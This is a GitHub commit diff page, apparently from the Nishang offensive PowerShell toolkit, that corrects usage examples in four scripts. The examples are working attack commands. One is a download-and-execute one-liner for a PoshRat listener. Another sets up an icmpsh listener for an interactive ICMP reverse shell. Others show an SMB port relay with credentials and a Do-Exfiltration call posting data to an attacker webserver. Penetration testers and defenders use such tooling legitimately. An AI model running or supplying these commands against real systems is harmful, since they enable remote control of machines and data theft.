File tree Expand file tree Collapse file tree 4 files changed +12
-3
lines changed
Expand file tree Collapse file tree 4 files changed +12
-3
lines changed Original file line number Diff line number Diff line change @@ -51,7 +51,7 @@ PS > Invoke-NetworkRelay -Relay v6tov4 -ListenAddress :: -Listenport 8888 -Conne
5151Add a network relay which listens on IPv6 and connects to IPv4 and forwards port 445 from 192.168.1.22 to port 8888 of 192.168.254.141.
5252
5353. EXAMPLE
54- PS > Invoke-NetworkRelay -Relay v6tov4 -ListenAddress :: -Listenport 8888 -ConnectAddress fe80::19ed:c169:128c:b68d -ConnectPort 445 -ComputerName domainpc -Username bharat\domainuser -Password Password1234
54+ PS > Invoke-NetworkRelay -Relay v6tov6 -ListenAddress :: -Listenport 8888 -ConnectAddress fe80::19ed:c169:128c:b68d -ConnectPort 445 -ComputerName domainpc -Username bharat\domainuser -Password Password1234
5555Add a network relay which listens on IPv6 and connects to IPv6 and forwards port 445 from fe80::19ed:c169:128c:b68d to port 8888 of domainpc
5656
5757. EXAMPLE
Original file line number Diff line number Diff line change @@ -23,7 +23,7 @@ The IP address on which the listener listens. Make sure that the IP address spec
2323The port on which the connection is establised.
2424
2525. EXAMPLE
26- PS > Invoke-PoshRatHttps -IPAddress 192.168.254.1 -Port 80
26+ PS > Invoke-PoshRatHttp -IPAddress 192.168.254.1 -Port 80
2727
2828Above shows an example where the listener starts on port 80. On the client execute:
2929iex (New-Object Net.WebClient).DownloadString("http://192.168.254.1/connect")
Original file line number Diff line number Diff line change @@ -19,6 +19,14 @@ Time in seconds for which the script waits for a command from the server. Defaul
1919The size of output Buffer. Defualt is 128.
2020
2121. EXAMPLE
22+ # sysctl -w net.ipv4.icmp_echo_ignore_all=1
23+ # python icmpsh_m.py 192.168.254.226 192.168.254.1
24+
25+ Run above commands to start a listener on a Linux computer (tested on Kali Linux).
26+ icmpsh_m.py is a part of the icmpsh tools.
27+
28+ On the target, run the below command.
29+
2230PS > Invoke-PowerShellIcmp-IPAddress 192.168.254.226
2331
2432Above shows an example of an interactive PowerShell reverse connect shell.
Original file line number Diff line number Diff line change @@ -45,7 +45,7 @@ PS > Get-Information | Do-Exfiltration -ExfilOption gmail -username <> -Password
4545Use above command for data exfiltration to gmail
4646
4747. EXAMPLE
48- PS > Get-Information | Do-Exfiltration -ExfilOption Webserver -URL http://192.168.254.183/catchpost.php
48+ PS > Do-Exfiltration -Data (Get-Process) -ExfilOption Webserver -URL http://192.168.254.183/catchpost.php
4949
5050Use above command for data exfiltration to a webserver which logs POST requests.
5151
@@ -96,6 +96,7 @@ https://github.com/samratashok/nishang
9696 $AuthNS
9797 )
9898
99+
99100 function post_http ($url , $parameters )
100101 {
101102 $http_request = New-Object - ComObject Msxml2.XMLHTTP
You can’t perform that action at this time.
0 commit comments